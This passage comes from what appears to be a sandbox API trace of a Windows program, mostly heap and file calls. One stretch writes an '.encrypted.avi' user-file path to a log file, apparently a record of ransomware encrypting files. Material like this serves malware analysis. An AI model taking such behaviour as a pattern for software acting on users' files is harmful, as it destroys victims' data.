hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.754] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.754] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.754] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.754] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.754] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.755] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.755] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x323a, lpOverlapped=0x0) returned 1 [0041.755] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.755] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x323a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.755] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.encrypted.avi\r\n", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0041.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3b) returned 0x7ab380 [0041.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.encrypted.avi\r\n", cchWideChar=59, lpMultiByteStr=0x7ab380, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2hbnq.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 59 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.755] WriteFile (in: hFile=0x140, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3a, lpOverlapped=0x0) returned 1 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.755] CloseHandle (hObject=0x140) returned 1 [0041.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.760] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.760] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.761] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.761] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.761] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.761] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.762] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.765] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 